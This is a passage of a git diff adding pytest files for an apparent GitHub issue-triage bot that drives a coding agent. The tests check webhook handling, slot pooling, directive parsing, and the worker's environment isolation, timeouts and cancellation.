_number): + return [ + CommentInfo(id=1, author="alice", body="me too", created_at="2026-05-01T10:00:00Z"), + CommentInfo(id=2, author="bob", body="confirmed", created_at="2026-05-02T10:00:00Z"), + ] + + monkeypatch.setattr(GitHubClient, "get_issue", _get_issue) + monkeypatch.setattr(GitHubClient, "list_comments", _list_comments) + + payload = { + "action": "created", + "issue": {"number": 88, "user": {"login": "alice"}, "title": "boom"}, + "comment": { + "user": {"login": "can1357"}, + "body": "@roboomp do X", + "id": 10, + "created_at": "2026-05-03T20:00:00Z", + }, + "repository": {"full_name": "octo/widget"}, + "_robomp_directive": {"body": "do X", "author": "can1357"}, + } + # Pre-seed an issue row so we exercise the "existing, non-finalized" path + # (otherwise we'd hit the bootstrap branch which is covered elsewhere). + db.upsert_issue(key="octo/widget#88", repo="octo/widget", number=88, state="reproducing", branch="farm/x/y") + + await tasks.handle_comment( + settings=settings, + db=db, + github=GitHubClient("t"), + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="test-delivery-4", + ) + + assert len(stub_run_task) == 1 + directive = stub_run_task[0]["directive"] + assert directive is not None + assert directive.body == "do X" + # Thread must include the body + both comments, in chronological order. + kinds_authors = [(m.kind, m.author) for m in directive.thread] + assert ("issue_body", "alice") in kinds_authors + assert ("comment", "alice") in kinds_authors + assert ("comment", "bob") in kinds_authors + close_database() + + +# ---------- triage_issue: closing-PR skip ---------- + + +class _StubGithubForTriage: + """Minimal `GitHubBackend` shim for triage_issue tests.""" + + def __init__(self, closing_prs: tuple[int, ...] | Exception = ()) -> None: + self._closing_prs = closing_prs + self.calls: list[tuple[str, int]] = [] + + async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]: + self.calls.append((repo, number)) + if isinstance(self._closing_prs, Exception): + raise self._closing_prs + return self._closing_prs + + +async def test_triage_issue_skips_when_a_closing_pr_already_exists( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """An OPEN PR linked via Closes/Fixes/Resolves means another author is on it. + The bot MUST NOT triage, label, or build a workspace — leave it alone.""" + from robomp import tasks + from robomp.github_client import IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=1069, + title="x", + body="y", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + github = _StubGithubForTriage(closing_prs=(1070,)) + + await tasks.triage_issue( + settings=settings, + db=db, + github=github, # type: ignore[arg-type] + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, # type: ignore[arg-type] + payload={"action": "opened", "issue": {"number": 1069}, "repository": {"full_name": "octo/widget"}}, + delivery_id="t-skip-1", + ) + + assert github.calls == [("octo/widget", 1069)] + assert stub_run_task == [], "must not invoke run_task when a closing PR exists" + assert sandbox.ensure_calls == [], "must not create a workspace when skipping" + assert db.get_issue("octo/widget#1069") is None, "must not persist an issue row when skipping" + close_database() + + +async def test_triage_issue_proceeds_when_no_closing_pr( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + from robomp import tasks + from robomp.github_client import IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=42, + title="x", + body="y", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + github = _StubGithubForTriage(closing_prs=()) + + await tasks.triage_issue( + settings=settings, + db=db, + github=github, # type: ignore[arg-type] + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, # type: ignore[arg-type] + payload={"action": "opened", "issue": {"number": 42}, "repository": {"full_name": "octo/widget"}}, + delivery_id="t-skip-2", + ) + + assert github.calls == [("octo/widget", 42)] + assert len(stub_run_task) == 1 + assert sandbox.ensure_calls, "workspace must be created when no closing PR" + row = db.get_issue("octo/widget#42") + assert row is not None and row.state == "reproducing" + close_database() + + +async def test_triage_issue_fails_open_when_timeline_fetch_errors( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """A transient timeline fetch failure MUST NOT block legitimate triage.""" + from robomp import tasks + from robomp.github_client import GitHubError, IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=99, + title="x", + body="y", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + github = _StubGithubForTriage(closing_prs=GitHubError(503, "upstream timeout")) + + await tasks.triage_issue( + settings=settings, + db=db, + github=github, # type: ignore[arg-type] + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, # type: ignore[arg-type] + payload={"action": "opened", "issue": {"number": 99}, "repository": {"full_name": "octo/widget"}}, + delivery_id="t-skip-3", + ) + + assert len(stub_run_task) == 1, "transient timeline error must fail open" + assert sandbox.ensure_calls + close_database() + + +async def test_triage_issue_does_not_recheck_when_issue_row_exists( + settings: Settings, tmp_path: Path, stub_run_task, monkeypatch +) -> None: + """A second triage of the same issue (e.g. retry/replay) MUST NOT re-query the + timeline — the bot is already committed and the row guards re-entry.""" + from robomp import tasks + from robomp.github_client import IssueInfo, RepoInfo + + sandbox = _RecordingSandbox(tmp_path) + db = get_database(settings.sqlite_path) + # Pre-seed the issue row as if a prior triage created it. + db.upsert_issue(key="octo/widget#7", repo="octo/widget", number=7, state="reproducing") + + repo = RepoInfo( + full_name="octo/widget", default_branch="main", clone_url="https://github.com/octo/widget.git", private=False + ) + issue = IssueInfo( + repo="octo/widget", + number=7, + title="x", + body="y", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ) + + async def _resolve(_gh, _payload): + return repo, issue + + monkeypatch.setattr(tasks, "_resolve_repo_and_issue", _resolve) + github = _StubGithubForTriage(closing_prs=(1070,)) # would skip if called + + await tasks.triage_issue( + settings=settings, + db=db, + github=github, # type: ignore[arg-type] + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, # type: ignore[arg-type] + payload={"action": "opened", "issue": {"number": 7}, "repository": {"full_name": "octo/widget"}}, + delivery_id="t-skip-4", + ) + + assert github.calls == [], "MUST NOT query timeline on a repeat-triage" + assert len(stub_run_task) == 1 + close_database() + + +# -------- /webhook/github cancellation hooks -------------------------------- + + +def _post_issue_comment_simple( + client: TestClient, + *, + delivery: str, + issue_number: int, + user: str = "alice", + secret: str = "test-webhook-secret", +): + return _post_issue_comment( + client, + delivery=delivery, + user=user, + number=issue_number, + body="follow-up", + secret=secret, + ) + + +def _post_issues_closed( + client: TestClient, + *, + delivery: str, + issue_number: int, + secret: str = "test-webhook-secret", +): + payload = { + "action": "closed", + "issue": {"number": issue_number, "user": {"login": "alice"}}, + "repository": {"full_name": "octo/widget"}, + } + body = json.dumps(payload).encode() + return client.post( + "/webhook/github", + content=body, + headers=_signed_headers(secret, body, event="issues", delivery=delivery), + ) + + +def _seed_pending_closure(db, *, key: str, number: int) -> None: + db.upsert_pending_closure( + issue_key=key, + repo="octo/widget", + number=number, + comment_id=42, + issue_author="alice", + close_at="2999-01-01T00:00:00.000000Z", + ) + + +def test_webhook_issue_comment_cancels_pending_closure(settings: Settings) -> None: + db = get_database(settings.sqlite_path) + key = issue_key("octo/widget", 7) + _seed_pending_closure(db, key=key, number=7) + app = create_app(settings) + with TestClient(app) as client: + resp = _post_issue_comment_simple(client, delivery="d-cancel-comment", issue_number=7) + assert resp.status_code == 202 + row = db.get_pending_closure(key) + assert row is not None + assert row.state == "cancelled" + assert row.cancel_reason == "user_replied" + close_database() + + +def test_webhook_issues_closed_cancels_pending_closure(settings: Settings) -> None: + db = get_database(settings.sqlite_path) + key = issue_key("octo/widget", 8) + _seed_pending_closure(db, key=key, number=8) + app = create_app(settings) + with TestClient(app) as client: + resp = _post_issues_closed(client, delivery="d-cancel-closed", issue_number=8) + assert resp.status_code == 202 + row = db.get_pending_closure(key) + assert row is not None + assert row.state == "cancelled" + assert row.cancel_reason == "externally_closed" + close_database() + + +def test_webhook_pr_conversation_does_not_cancel_pending_closure(settings: Settings) -> None: + """A comment on a PR (issue payload with `pull_request`) routes to + `handle_pr_conversation`, which is unrelated to the question auto-close + schedule on the originating issue.""" + db = get_database(settings.sqlite_path) + key = issue_key("octo/widget", 9) + _seed_pending_closure(db, key=key, number=9) + app = create_app(settings) + with TestClient(app) as client: + # Use the existing PR-issue-comment helper (number 9 here is the PR). + resp = _post_pr_issue_comment( + client, + delivery="d-pr-noop", + user="alice", + pr_number=9, + ) + assert resp.status_code == 202 + row = db.get_pending_closure(key) + # Row may have been touched only if the PR maps back to issue 9; safest + # assertion: the row stays `pending` because routing went down a path + # other than `handle_comment`. + assert row is not None + assert row.state == "pending" + close_database() diff --git a/python/robomp/tests/test_slot_pool.py b/python/robomp/tests/test_slot_pool.py new file mode 100644 index 000000000..2159682e6 --- /dev/null +++ b/python/robomp/tests/test_slot_pool.py @@ -0,0 +1,56 @@ +from __future__ import annotations + +import asyncio + +import pytest + +from robomp.slot_pool import SlotPool + + +@pytest.mark.asyncio +async def test_empty_pool_is_noop() -> None: + pool = SlotPool() + + assert await pool.acquire() is None + pool.release(None) + + +@pytest.mark.asyncio +async def test_acquire_release_reuses_uid() -> None: + pool = SlotPool([2001]) + + assert await pool.acquire() == 2001 + pool.release(2001) + + assert await pool.acquire() == 2001 + + +@pytest.mark.asyncio +async def test_double_release_rejected() -> None: + pool = SlotPool([2001]) + + slot_uid = await pool.acquire() + pool.release(slot_uid) + + with pytest.raises(ValueError, match="not acquired"): + pool.release(slot_uid) + + +def test_duplicate_slots_rejected() -> None: + with pytest.raises(ValueError, match="unique"): + SlotPool([2001, 2001]) + + +@pytest.mark.asyncio +async def test_concurrent_acquire_waits_until_release() -> None: + pool = SlotPool([2001]) + + first_slot_uid = await pool.acquire() + second_acquire = asyncio.create_task(pool.acquire()) + await asyncio.sleep(0) + + assert not second_acquire.done() + + pool.release(first_slot_uid) + + assert await second_acquire == 2001 diff --git a/python/robomp/tests/test_tasks_directive.py b/python/robomp/tests/test_tasks_directive.py new file mode 100644 index 000000000..f32ac8352 --- /dev/null +++ b/python/robomp/tests/test_tasks_directive.py @@ -0,0 +1,51 @@ +"""Verify pragmas survive the payload round-trip from server → durable queue → tasks.""" + +from __future__ import annotations + +from robomp.tasks import _directive_from_payload + + +def test_directive_from_payload_parses_pragmas() -> None: + directive = _directive_from_payload( + { + "_robomp_directive": { + "body": "do the thing", + "author": "can1357", + "pragmas": [["model", "gpt"], ["thinking", "low"]], + } + } + ) + assert directive is not None + assert directive.body == "do the thing" + assert directive.author == "can1357" + assert directive.pragmas == (("model", "gpt"), ("thinking", "low")) + + +def test_directive_from_payload_missing_pragmas_is_empty_tuple() -> None: + directive = _directive_from_payload({"_robomp_directive": {"body": "x", "author": "can1357"}}) + assert directive is not None + assert directive.pragmas == () + + +def test_directive_from_payload_drops_malformed_pragma_entries() -> None: + directive = _directive_from_payload( + { + "_robomp_directive": { + "body": "x", + "author": "can1357", + "pragmas": [ + ["model", "gpt"], + ["bad"], # wrong arity + [1, "v"], # non-string key + "string-instead-of-pair", + ], + } + } + ) + assert directive is not None + assert directive.pragmas == (("model", "gpt"),) + + +def test_directive_from_payload_returns_none_for_missing_directive() -> None: + assert _directive_from_payload({}) is None + assert _directive_from_payload({"_robomp_directive": "not-a-mapping"}) is None diff --git a/python/robomp/tests/test_worker.py b/python/robomp/tests/test_worker.py new file mode 100644 index 000000000..e5ca6848b --- /dev/null +++ b/python/robomp/tests/test_worker.py @@ -0,0 +1,770 @@ +"""Resume-aware behavior of `worker._run_rpc_blocking`. + +These tests swap `robomp.worker.RpcClient` for a recording fake so we can +observe the `extra_args` and `set_todos` decisions the driver takes based on +whether the workspace's omp session directory already holds a JSONL transcript. +""" + +from __future__ import annotations + +import asyncio +import stat +from pathlib import Path +from types import SimpleNamespace + +import pytest + +from robomp import worker +from robomp.config import Settings + + +class _FakeRpcClient: + instances: list[_FakeRpcClient] = [] + + def __init__(self, **kwargs): + self.kwargs = kwargs + self.set_todos_calls: list[list[dict]] = [] + self.get_todos_calls = 0 + self.stop_calls = 0 + self.mark_closed_calls: list[BaseException] = [] + _FakeRpcClient.instances.append(self) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc, tb): + return False + + def install_headless_ui(self) -> None: + pass + + def on_tool_execution_end(self, _cb) -> None: + pass + + def on_message_update(self, _cb) -> None: + pass + + def stop(self) -> None: + self.stop_calls += 1 + + def _mark_closed(self, error: BaseException) -> None: + self.mark_closed_calls.append(error) + + def set_todos(self, phases): + self.set_todos_calls.append(phases) + + def get_todos(self): + self.get_todos_calls += 1 + return () + + def prompt_and_wait(self, prompt, timeout): + if not hasattr(self, "prompts"): + self.prompts: list[str] = [] + self.prompts.append(prompt) + hook = getattr(self, "on_prompt", None) + if hook is not None: + hook(self, prompt) + + class _Turn: + messages: list = [] + events: list = [] + assistant_text: str = "ok" + + return _Turn() + + +_SEEDED_PHASES = [ + { + "id": "p1", + "name": "Reproduce", + "tasks": [ + { + "id": "t1", + "content": "do it", + "status": "pending", + "notes": "", + "details": "", + } + ], + } +] + + +def _make_inputs( + tmp_path: Path, settings: Settings, *, session_has_jsonl: bool, slot_uid: int | None = None +) -> tuple[worker.TaskInputs, SimpleNamespace]: + root = tmp_path / "workspace" + root.mkdir() + session_dir = root / "session" + session_dir.mkdir() + if session_has_jsonl: + (session_dir / "foo.jsonl").write_text("{}\n", encoding="utf-8") + repo_dir = root / "repo" + repo_dir.mkdir() + + workspace = SimpleNamespace( + root=root, + session_dir=session_dir, + repo_dir=repo_dir, + branch="robomp/issue-1", + ) + repo = SimpleNamespace(full_name="acme/widgets", owner="acme", name="widgets") + issue = SimpleNamespace(repo="acme/widgets", number=1, title="bug") + + db = SimpleNamespace(set_event_model=lambda _did, _model: None, get_issue=lambda _key: None) + github = SimpleNamespace() + + inputs = worker.TaskInputs( + settings=settings, + db=db, # type: ignore[arg-type] + github=github, # type: ignore[arg-type] + git_transport=SimpleNamespace(), # type: ignore[arg-type] + repo=repo, # type: ignore[arg-type] + issue=issue, # type: ignore[arg-type] + workspace=workspace, # type: ignore[arg-type] + delivery_id="d-test", + attempts=0, + slot_uid=slot_uid, + ) + bindings = SimpleNamespace( + workspace=workspace, + repo=repo, + issue=issue, + issue_key=f"{repo.full_name}#{issue.number}", + abort=None, + ) + return inputs, bindings + + +@pytest.fixture(autouse=True) +def _reset_fake() -> None: + _FakeRpcClient.instances.clear() + + +@pytest.fixture(autouse=True) +def _patch_worker(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + monkeypatch.setattr("robomp.worker.RpcClient", _FakeRpcClient) + monkeypatch.setattr("robomp.worker._AGENT_HOME_STAGE", tmp_path / "missing-agent-home-stage") + monkeypatch.setattr("robomp.worker.host_tools.build", lambda _b: ()) + monkeypatch.setattr( + "robomp.worker.persona.system_append", + lambda *, repo, issue, workspace: "SYS", + ) + monkeypatch.setattr( + "robomp.worker.persona.seed_phases", + lambda _kind: [dict(p) for p in _SEEDED_PHASES], + ) + + +@pytest.mark.asyncio +async def test_run_rpc_passes_continue_when_session_jsonl_present(tmp_path: Path, settings: Settings) -> None: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=True) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + assert _FakeRpcClient.instances[0].kwargs["extra_args"] == ("--continue",) + + +@pytest.mark.asyncio +async def test_run_rpc_omits_continue_when_session_empty( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + agent_home = tmp_path / "agent-home" + agent_home.mkdir() + monkeypatch.setattr(worker, "_AGENT_HOME", agent_home) + + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + assert _FakeRpcClient.instances[0].kwargs["extra_args"] == () + client_kwargs = _FakeRpcClient.instances[0].kwargs + assert client_kwargs["env"]["HOME"] == str(agent_home) + assert client_kwargs["env"]["GITHUB_TOKEN"] == "" + assert client_kwargs["env"]["GITHUB_WEBHOOK_SECRET"] == "" + assert client_kwargs["env"]["ROBOMP_REPLAY_TOKEN"] == "" + assert client_kwargs["env"]["ROBOMP_GH_PROXY_HMAC_KEY"] == "" + assert client_kwargs["user"] is None + assert client_kwargs["group"] is None + assert client_kwargs["extra_groups"] is None + + +def test_build_extra_env_stages_agent_home(tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch) -> None: + stage_home = tmp_path / "agent-home-stage" + agent_home = tmp_path / "agent-home" + monkeypatch.setattr(worker, "_AGENT_HOME_STAGE", stage_home) + monkeypatch.setattr(worker, "_AGENT_HOME", agent_home) + + agent_dir = stage_home / ".agent" + agent_rules_dir = agent_dir / "rules" + omp_agent_dir = stage_home / ".omp" / "agent" + agent_rules_dir.mkdir(parents=True) + omp_agent_dir.mkdir(parents=True) + (agent_dir / "AGENTS.md").write_text("agent instructions\n", encoding="utf-8") + (agent_rules_dir / "rule.md").write_text("rule\n", encoding="utf-8") + (omp_agent_dir / "models.yml").write_text("models: []\n", encoding="utf-8") + + env = worker._build_extra_env(settings) + + assert env["HOME"] == str(agent_home) + assert (agent_home / ".agent" / "AGENTS.md").is_file() + assert (agent_home / ".agent" / "rules" / "rule.md").is_file() + assert (agent_home / ".omp" / "agent" / "models.yml").is_file() + assert (agent_home / ".agent").stat().st_mode & 0o777 == 0o755 + assert (agent_home / ".agent" / "AGENTS.md").stat().st_mode & 0o777 == 0o644 + assert (agent_home / ".agent" / "rules").stat().st_mode & 0o777 == 0o755 + assert (agent_home / ".agent" / "rules" / "rule.md").stat().st_mode & 0o777 == 0o644 + assert (agent_home / ".omp" / "agent").stat().st_mode & 0o777 == 0o755 + assert (agent_home / ".omp" / "agent" / "models.yml").stat().st_mode & 0o777 == 0o644 + + +@pytest.mark.asyncio +async def test_run_rpc_omits_home_when_agent_home_absent( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + monkeypatch.setattr(worker, "_AGENT_HOME", tmp_path / "missing-agent-home") + + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + client_kwargs = _FakeRpcClient.instances[0].kwargs + assert "HOME" not in client_kwargs["env"] + assert client_kwargs["env"]["GITHUB_TOKEN"] == "" + assert client_kwargs["env"]["GITHUB_WEBHOOK_SECRET"] == "" + assert client_kwargs["env"]["ROBOMP_REPLAY_TOKEN"] == "" + assert client_kwargs["env"]["ROBOMP_GH_PROXY_HMAC_KEY"] == "" + + +@pytest.mark.asyncio +async def test_run_rpc_uses_workspace_xdg_dirs_without_slot(tmp_path: Path, settings: Settings) -> None: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False, slot_uid=None) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + + env = _FakeRpcClient.instances[0].kwargs["env"] + xdg_root = inputs.workspace.root / ".omp-xdg" + for key in ("XDG_DATA_HOME", "XDG_STATE_HOME", "XDG_CACHE_HOME"): + path = Path(env[key]) + assert path.is_relative_to(xdg_root) + assert (path / "omp").is_dir() + tmpdir = inputs.workspace.root / ".omp-tmp" + assert env["TMPDIR"] == str(tmpdir) + assert env["TMP"] == str(tmpdir) + assert env["TEMP"] == str(tmpdir) + assert env["GIT_CONFIG_COUNT"] == "1" + assert env["GIT_CONFIG_KEY_0"] == "safe.directory" + assert env["GIT_CONFIG_VALUE_0"] == str(inputs.workspace.repo_dir) + assert env["GIT_AUTHOR_NAME"] == settings.resolved_author_name + assert env["GIT_AUTHOR_EMAIL"] == settings.git_author_email + assert env["GIT_COMMITTER_NAME"] == settings.resolved_author_name + assert env["GIT_COMMITTER_EMAIL"] == settings.git_author_email + assert tmpdir.is_dir() + assert stat.S_IMODE(tmpdir.stat().st_mode) == 0o700 + + +@pytest.mark.asyncio +async def test_run_rpc_uses_workspace_xdg_dirs_for_slot_without_chown( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + chown_calls: list[tuple[Path, int, int]] = [] + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.os.chown", lambda path, uid, gid: chown_calls.append((Path(path), uid, gid))) + + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False, slot_uid=2001) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + + env = _FakeRpcClient.instances[0].kwargs["env"] + for key in ("XDG_DATA_HOME", "XDG_STATE_HOME", "XDG_CACHE_HOME"): + base = Path(env[key]) + assert base.is_dir() + assert (base / "omp").is_dir() + assert Path(env["BUN_INSTALL_CACHE_DIR"]).is_dir() + assert chown_calls == [] + + +@pytest.mark.asyncio +async def test_run_rpc_skips_set_todos_on_resumed_triage(tmp_path: Path, settings: Settings) -> None: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=True) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + assert _FakeRpcClient.instances[0].set_todos_calls == [] + + +@pytest.mark.asyncio +async def test_run_rpc_seeds_todos_on_fresh_triage(tmp_path: Path, settings: Settings) -> None: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + calls = _FakeRpcClient.instances[0].set_todos_calls + assert len(calls) == 1 + assert calls[0] == _SEEDED_PHASES + + +@pytest.mark.asyncio +async def test_run_rpc_merges_todos_on_followup_with_resume(tmp_path: Path, settings: Settings) -> None: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=True) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="handle_comment", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + client = _FakeRpcClient.instances[0] + assert client.get_todos_calls == 1 + assert len(client.set_todos_calls) == 1 + assert len(client.set_todos_calls[0]) == len(_SEEDED_PHASES) + + +@pytest.mark.asyncio +async def test_run_rpc_passes_slot_uid_user_slot_group_and_omp_extra_group(tmp_path: Path, settings: Settings) -> None: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False, slot_uid=2001) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + client_kwargs = _FakeRpcClient.instances[0].kwargs + assert client_kwargs["user"] == 2001 + assert client_kwargs["group"] == 2001 + assert client_kwargs["extra_groups"] == ["omp"] + + +@pytest.mark.asyncio +async def test_run_rpc_arms_hard_timeout_timer( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + timers = [] + + class FakeTimer: + def __init__(self, interval, function): + self.interval = interval + self.function = function + self.daemon = False + self.started = False + self.cancelled = False + timers.append(self) + + def start(self) -> None: + self.started = True + + def cancel(self) -> None: + self.cancelled = True + + monkeypatch.setattr("robomp.worker.threading.Timer", FakeTimer) + settings.task_timeout_seconds = 3.0 + settings.task_timeout_hard_grace_seconds = 7.0 + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + + assert len(timers) == 1 + timer = timers[0] + assert timer.interval == 10.0 + assert timer.daemon is True + assert timer.started is True + assert timer.cancelled is True + + +@pytest.mark.asyncio +async def test_run_rpc_hard_timeout_stops_client_and_fails( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + class FiringTimer: + def __init__(self, interval, function): + self.interval = interval + self.function = function + self.daemon = False + self.cancelled = False + + def start(self) -> None: + self.function() + + def cancel(self) -> None: + self.cancelled = True + + monkeypatch.setattr("robomp.worker.threading.Timer", FiringTimer) + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False) + loop = asyncio.new_event_loop() + try: + with pytest.raises(TimeoutError, match="hard timeout"): + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + + fake = _FakeRpcClient.instances[0] + assert fake.stop_calls == 1 + # `_cancel_hook` (used by both manual cancel and hard timeout) MUST also call + # `_mark_closed` to unblock `_wait_for_agent_end` — `stop()` alone leaves + # `_closed_error` unset (omp_rpc bug), so the worker would hang otherwise. + assert len(fake.mark_closed_calls) == 1 + from omp_rpc import RpcProcessExitError + + assert isinstance(fake.mark_closed_calls[0], RpcProcessExitError) + + +@pytest.mark.asyncio +async def test_run_rpc_cancel_hook_stops_and_marks_closed( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + """The cancel hook registered with `register_cancel_hook` must call both + `client.stop()` AND `client._mark_closed()`. The latter is the workaround for + an upstream omp_rpc bug where `stop()` does not set `_closed_error`, leaving + `_wait_for_agent_end` blocked until timeout.""" + captured: list = [] + monkeypatch.setattr("robomp.worker.register_cancel_hook", lambda hook: captured.append(hook)) + monkeypatch.setattr("robomp.worker.unregister_cancel_hook", lambda: None) + + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=False) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="x", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + + assert len(captured) == 1 + hook = captured[0] + fake = _FakeRpcClient.instances[0] + pre_stop = fake.stop_calls + hook() # Simulate the API/worker firing the cancel + assert fake.stop_calls == pre_stop + 1 + assert len(fake.mark_closed_calls) == 1 + from omp_rpc import RpcProcessExitError + + assert isinstance(fake.mark_closed_calls[0], RpcProcessExitError) + assert "cancelled by operator" in str(fake.mark_closed_calls[0]) + + +class _ClassifiedRow: + """Stand-in for `db.IssueRow` carrying just `.classification`.""" + + def __init__(self, classification: str | None) -> None: + self.classification = classification + + +def _make_inputs_with_classification( + tmp_path: Path, + settings: Settings, + *, + classification: str | None, +) -> tuple[worker.TaskInputs, SimpleNamespace]: + inputs, bindings = _make_inputs(tmp_path, settings, session_has_jsonl=True) + row = _ClassifiedRow(classification) if classification else None + inputs.db.get_issue = lambda _key: row # type: ignore[attr-defined] + bindings.db = inputs.db # tools_called check uses inputs.db.get_issue + return inputs, bindings + + +@pytest.mark.asyncio +async def test_run_rpc_sends_reminder_when_pr_class_quits_early(tmp_path: Path, settings: Settings) -> None: + """`bug` classified turn that never calls a terminal tool gets a reminder.""" + inputs, bindings = _make_inputs_with_classification(tmp_path, settings, classification="bug") + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="kickoff", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + fake = _FakeRpcClient.instances[0] + # kickoff + 2 reminders (default ROBOMP_TASK_COMPLETION_MAX_REMINDERS=2) + assert len(fake.prompts) == 1 + settings.task_completion_max_reminders + assert fake.prompts[0] == "kickoff" + assert all("terminal action" in p.lower() or "open the pr" in p.lower() for p in fake.prompts[1:]) + + +@pytest.mark.asyncio +async def test_run_rpc_stops_reminding_after_terminal_tool(tmp_path: Path, settings: Settings) -> None: + """A reminder turn that fires `gh_open_pr` halts the loop.""" + inputs, bindings = _make_inputs_with_classification(tmp_path, settings, classification="bug") + + # First turn returns with no terminal tool; first reminder causes the + # agent to "call" gh_open_pr — simulated by mutating the worker's + # tools_called set via the on_prompt hook on the next prompt. + def _on_prompt(client: _FakeRpcClient, prompt: str) -> None: + if len(client.prompts) == 2: # this is the first reminder + # Mimic a tool_end firing during the reminder turn by writing + # into the closure set the driver tracks. We can't reach it + # directly; instead trip the abort path? No — use the public + # contract: tool_end fires through on_tool_execution_end. The + # driver registers the callback before prompt_and_wait, so we + # replay it here. + for cb in client._tool_end_callbacks: + cb(SimpleNamespace(tool_name="gh_open_pr", result={})) + + # Capture the registered tool_end callback on the fake. + original_on_tool_end = _FakeRpcClient.on_tool_execution_end + + def _record_tool_end(self, cb) 